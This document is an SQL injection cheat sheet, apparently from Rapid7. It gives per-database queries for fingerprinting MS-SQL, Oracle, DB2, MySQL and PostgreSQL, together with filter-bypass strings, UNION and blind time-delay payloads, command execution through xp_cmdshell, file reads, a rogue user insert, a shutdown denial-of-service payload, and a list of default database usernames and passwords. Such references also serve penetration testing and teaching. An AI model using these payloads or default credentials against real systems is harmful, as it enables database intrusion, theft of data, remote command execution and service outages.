
SQL Injection Commands Guide

This document provides a cheat sheet of common SQL injection commands that can be used to discover information about backend databases and perform SQL injection attacks. It includes commands to find the database version, list users, view tables and columns, determine the current user, and more for various database types including MS SQL, Oracle, MySQL, PostgreSQL, and IBM DB2. It also lists default usernames and passwords that are commonly used for accessing databases.

SQL INJECTION CHEAT SHEET

www.rapid7.com

Common SQL Injection Commands for Backend Databases

MS-SQL

Grab version: @@version
Users: name FROM master..syslogins
Tables: name FROM master..sysobjects WHERE xtype = U
Database: name FROM master..sysdatabases;
Columns: name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = <TABLENAME>)
Running User: DB_NAME()

Oracle

Grab version: table v$version compare with Oracle%
Users: * from dba_users
Tables: table_name from all_tables
Database: distinct owner from all_tables
Columns: column_name from all_tab_columns where table_name=<TABLENAME>
Running User: user from dual

IBM DB2

Grab version: Versionnumber from sysibm.sysversions;
Users: user from sysibm.sysdummy1
Tables: name from sysibm.systables
Database: schemaname from syscat.schemata
Columns: name, tbname, coltype from sysibm.syscolumns
Running User: user from sysibm.sysdummy1

MySQL

Grab version: @@version
Users: * from mysql.user
Tables: table_schema,table_name FROM information_schema.tables WHERE table_schema != mysql AND table_schema != information_schema
Database: distinct(db) FROM mysql.db
Columns: table_schema, column_name FROM information_schema.columns WHERE table_schema != mysql AND table_schema != information_schema AND table_name = <TABLENAME>
Running User: user()

PostgreSQL

Grab version: version()
Users: * from pg_user
Database: datname FROM pg_database
Running User: user;

SQL Injection Discovery

Common SQL Injection Attack Strings

Query syntax breaking: Single Quote('), Double Quote(")
Injection SQL comment: Hyphens (--), Hash(#), Comment(/*)
Extending/Appending queries: Semicolon (;)
Injecting/Bypassing filters: CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT(), NULL

Common SQL Injection Commands

Injecting Union: Union all select NULL (Multiple columns)
Running Command: 1;exec master..xp_cmdshell dir>C:\inetpub\wwwroot\dir.txt OR master.dbo.xp_cmdshell
Loading Files: LOAD_FILE(), User UTL_FILE and utfReadfileAsTable
Adding user: 1; insert into users values(nto,nto123)
DoS: 1;shutdown
Fetching Fields: select name from syscolumns where id =(select id FROM sysobjects where name = target table name) (Union can help)

Common Blind SQL Injection Commands

Quick Check: AND 1=1, AND 1=0
User Check: 1+AND+USER_NAME()=dbo
Injecting Wait: 1;waitfor+delay+0:0:10
Check for sa: SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115
Looping/Sleep: BENCHMARK(TIMES, TASK), pg_sleep(10)

Default Usernames/Passwords

Oracle: scott/tiger, dbsnmp/dbsnmp
MySQL: mysql/<BLANK>, root/<BLANK>
PostgreSQL: postgres/<BLANK>
MS-SQL: sa/<BLANK>
DB2: db2admin/db2admin
